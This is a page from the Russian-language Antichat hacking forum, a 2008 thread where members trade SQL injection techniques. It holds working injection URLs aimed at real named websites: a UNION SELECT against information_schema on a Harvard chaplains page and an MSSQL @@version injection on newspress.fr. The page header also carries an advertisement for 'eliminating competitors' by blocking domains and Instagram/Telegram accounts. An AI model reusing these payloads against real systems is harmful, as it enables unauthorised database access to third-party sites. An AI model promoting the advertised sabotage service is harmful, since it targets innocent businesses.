УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 100 из 2438

100

Опции темы

Поиск в этой теме

Опции просмотра

#991

18.02.2008, 21:35

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

.Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо..
з\ы или тебя сама конструкция запроса смутила?

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#992

18.02.2008, 21:39

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от Constantine

Полностью согласен, это как в MSSQL или SYBASE в syscolumns есть информация о объектах которым принадлежат колонки (только там id объекта) а в мускуле именно имя таблицы

__________________
Карфаген должен быть разрушен...

#993

18.02.2008, 21:42

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

2 .Slip
можно даже имя базы оттуда вытащить
пример(бага старая найдена не мной)
_http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6,7,8,9,10,11+from+information_schem a.columns+where+column_name=0x75736572+limit+1,1/*

#994

18.02.2008, 21:46

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Мм.. Дам-с, лоханулся я тут.

__________________
..

#995

18.02.2008, 21:48

ZAMUT

Members of Antichat - Level 5

Регистрация: 24.10.2007

Сообщений: 256

Провел на форуме:
6905523

Репутация: 1174

Цитата:

Сообщение от jokester

Этот прием показывал Grey

#996

18.02.2008, 21:49

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

разговор ни о чём
узнать имя таблицы по её содержимому нельзя, а дальше непонятная мне дискуссия про information_schema =\
PS онтечад

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#997

18.02.2008, 22:05

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

История оценок репутации для Spyder:
+3 Ваши вопросы по уязвимо... 18.02.2008 20:55 ZAMUT если мускул 5.х то можно

Вот покажи мне запрос который вернёт имя таблицы, при том что я не знаю имён колонок и у меня только одно значение 123456. Кто сказал что колонка с паролями имеет в своём имени "pas", мб она называется "paroli"
В таком случае запрос Константина
select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
работать не будет, и вообще это больше похоже на игру "угадай буквы в имени колонки".
Ответ на вопрос 0nep@t0p'a нет, Слип и Scipio правильно написали, узнать таблицу по её содержимому нельзя

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#998

18.02.2008, 22:08

ZAMUT

Members of Antichat - Level 5

Регистрация: 24.10.2007

Сообщений: 256

Провел на форуме:
6905523

Репутация: 1174

Spyder, ну да только угадайка ..

Последний раз редактировалось ZAMUT; 18.02.2008 в 22:13.. Причина: опять перепутал =\

#999

18.02.2008, 23:04

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

Отправить сообщение для MaSter GeN с помощью ICQ

Код:

http://www.newspress.fr/index.asp?lang=hfg'

собственно что енто уязвимость ? что из этого можно вообше можно выжать если вообше можно ? собственно с таким первый раз сталкиваюсь

собственно при подставлении в значение ленг сужествуюшего фаыла начинаеть материться под другому тока на французком

Последний раз редактировалось MaSter GeN; 18.02.2008 в 23:08.. Причина: !!

#1000

18.02.2008, 23:13

Macro

Постоянный

Регистрация: 11.11.2006

Сообщений: 595

Провел на форуме:
1845062

Репутация: 1079

Это mssql инъекция
http://www.newspress.fr/index.asp?lang='+or+1=@@version--

Страница 100 из 2438

100

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход